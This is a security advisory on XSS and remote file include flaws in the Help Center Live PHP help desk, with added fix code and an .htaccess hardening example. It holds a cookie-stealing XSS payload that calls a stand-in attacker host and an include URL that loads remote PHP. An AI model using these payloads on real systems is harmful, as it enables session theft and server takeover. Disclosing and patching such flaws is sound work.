Description:
Help Center Live is a `Live` help desk system written in PHP with a MySQL database
backend that combines live support, trouble tickets and an FAQ in one project. It
is a very popular application, especially with web hosts and similar services.
Cross Site Scripting:
Cross site scripting exists in Help Center Live. The vulnerability exists because
user-supplied input in the find parameter of faq/index.php is not checked or encoded
before it is placed in the page. Below is an example.
http://path/faq/index.php?find=[CODEGOESHERE]&search=Search
This vulnerability could be used to steal cookie-based authentication credentials within
the scope of the current domain, or to render hostile code in a victim's browser.
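The following is an added example and not Help Center Live's own faq/index.php; it reconstructs the reflection pattern the advisory describes in a minimal form and shows the fix beside it. The function names, the markup, and the payload are assumptions made for this example.

```php
<?php
// Added example, not Help Center Live code. faq/index.php reflects the "find"
// parameter into the results page; this is a minimal reconstruction of that
// pattern (assumed markup) next to the encoded version.

// Vulnerable pattern: the raw parameter is written into both an attribute value
// and element content. With register_globals=On the same request value also
// arrives as the global $find, which is how the original script receives it.
function faq_search_vulnerable($find)
{
    return '<input type="text" name="find" value="' . $find . '">'
         . '<p>Results for ' . $find . '</p>';
}

// Fixed pattern: encode for HTML once, at output time. ENT_QUOTES also encodes
// the double quote, so a payload cannot close the value="" attribute early.
function faq_search_fixed($find)
{
    $safe = htmlspecialchars($find, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="find" value="' . $safe . '">'
         . '<p>Results for ' . $safe . '</p>';
}

// Constructed payload standing in for the advisory's [CODEGOESHERE] placeholder:
// it breaks out of the attribute and sends document.cookie to a third-party host.
$payload = '"><script>document.location="http://attacker/?c="+document.cookie</script>';

// In the vulnerable output the <script> element reaches the browser unchanged;
// in the fixed output every <, >, " and ' is an entity and the page shows it as text.
echo faq_search_vulnerable($payload), "\n";
echo faq_search_fixed($payload), "\n";
```

The encoding must happen where the value is written into HTML, not where it is read: the same `find` value may also be used in the MySQL query, which needs its own escaping, and stripping characters on input would leave one of the two contexts unprotected.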
File Include Vulnerability:
There is a very dangerous file include vulnerability in Help Center Live. An attacker
can run system commands with the rights of the web server by including a malicious file:
http://path/inc/pipe.php?HCL_path=http://attacker
All an attacker has to do is host arbitrary PHP code at that URL and it will be fetched
and executed. Here is the vulnerable code, located in inc/pipe.php:
$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);
Since pipe.php can be requested directly, $HCL_path is taken straight from the query
string as long as register_globals is turned on in the PHP configuration, and the
include() then fetches the remote file as long as the PHP build allows URL includes
(allow_url_fopen on PHP 4 and 5.0/5.1, allow_url_include from PHP 5.2 onwards).
There is a similar issue in skin.php, where $HCL_path, $SKIN_name and $SKIN_type are
concatenated into a path that is passed to fopen(). In some circumstances this could be
used to read arbitrary local files, and possibly more.
// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
    $SKIN_inner = "default";
}
// Get the skins
// $HCL_path, $SKIN_name and $SKIN_type all arrive via register_globals, so
// the whole path, including "../" sequences, is under the caller's control.
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
// Inner skin file, named e.g. blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);
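Both the pipe.php include and the skin.php fopen() above have the same root cause: a path built from variables that register_globals lets the request populate, in a script that can be called directly. The following is an added example and not Help Center Live's own code; it shows one way to close both holes at the code level. IN_HCL, HCL_PATH, hcl_require_entry_point() and hcl_skin_file() are names chosen for this example, and it assumes the skin parameters are request values (in the original they arrive as globals).

```php
<?php
// Added example, not Help Center Live code. Shows the hardened counterpart of
// inc/pipe.php and inc/skin.php: a direct-access guard plus paths that are
// never derived from request-controlled variables. Names are assumptions.

// (1) Done once by the front controller (index.php) before anything from inc/
// is included. Constants cannot be overwritten by register_globals, so
// ?HCL_path=http://attacker no longer has anything to overwrite.
define('IN_HCL', true);
define('HCL_PATH', dirname(__FILE__));

// (2) First call in every script under inc/ (pipe.php, skin.php, ...). A direct
// request never passes through index.php, so IN_HCL is undefined and the
// script stops before any include() or fopen() below can run.
function hcl_require_entry_point()
{
    if (!defined('IN_HCL')) {
        header('HTTP/1.0 403 Forbidden');
        exit('Direct access is not permitted.');
    }
}

// (3) pipe.php: build the include path from the constant, not from $HCL_path.
function hcl_decode_message_path()
{
    return HCL_PATH . '/inc/DecodeMessage.inc';
}

// (4) skin.php: accept only whitelisted name parts, then confirm the resolved
// file still lives under inc/skins/. Returns the absolute path or false.
function hcl_skin_file($skin_name, $skin_type, $skin_inner = 'default')
{
    foreach (array($skin_name, $skin_type, $skin_inner) as $part) {
        // Letters, digits, "_" and "-" only: no "/", "..", NUL bytes or "http:".
        if (!preg_match('/^[A-Za-z0-9_-]+$/', $part)) {
            return false;
        }
    }
    $base = realpath(HCL_PATH . '/inc/skins');
    if ($base === false) {
        return false;
    }
    $file = realpath($base . '/' . $skin_name . '/' . $skin_type
                     . '_inner_' . $skin_inner . '.hcl');
    // realpath() collapses symlinks and ".."; the result must stay under $base.
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $file;
}

// Usage as it would appear in skin.php: request values read explicitly from
// $_GET instead of trusting whatever register_globals injected.
hcl_require_entry_point();
$skin_name  = isset($_GET['SKIN_name'])  ? $_GET['SKIN_name']  : 'default';
$skin_type  = isset($_GET['SKIN_type'])  ? $_GET['SKIN_type']  : 'default';
$skin_inner = isset($_GET['SKIN_inner']) ? $_GET['SKIN_inner'] : 'default';
$file = hcl_skin_file($skin_name, $skin_type, $skin_inner);
if ($file === false) {
    exit('Unknown skin.');
}
$SKIN_output_inner = file_get_contents($file);
```

The whitelist check is what actually stops traversal; the realpath() comparison is a second line of defence in case a skin directory ever contains a symlink pointing outside inc/skins/. Neither replaces the web-server-level denial in the Solution below: with the guard in place a direct request to inc/pipe.php still reaches PHP, it just does nothing.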
Solution:
I have contacted the developer, but received no answer. My advice would be for any users
running Help Center Live to deny direct access to the /inc/ directory, as it is not needed.
This can be accomplished in the Apache web server by configuring a .htaccess file to
"deny from all" and so restrict access to the directory containing the vulnerable files.
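The following .htaccess is an added example of that configuration, not a file shipped with Help Center Live. It is placed in the inc/ directory and assumes the directory's AllowOverride setting permits Limit (or AuthConfig on 2.4) directives; if AllowOverride is None the file is silently ignored and the scripts remain reachable, which is worth verifying with a direct request to inc/pipe.php afterwards.

```apache
# Added example, not part of the Help Center Live distribution.
# Drop this file into the inc/ directory as .htaccess so that no script in it
# can be requested directly. The include() calls from index.php and the other
# front-end scripts are unaffected, because they happen on the filesystem.

<IfModule mod_authz_core.c>
    # Apache 2.4 and later
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    # Apache 2.2 and earlier (the syntax the advisory refers to)
    Order deny,allow
    Deny from all
</IfModule>
```

Since both issues depend on register_globals being on, turning it off in php.ini (register_globals = Off) removes the precondition entirely, and a whole-site check that it is off is a reasonable companion to the directory denial; with mod_php the same can be done per site with `php_flag register_globals off` in the document root's .htaccess, provided AllowOverride Options is permitted there.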
Credits:
James Bercegay of the GulfTech Security Research Team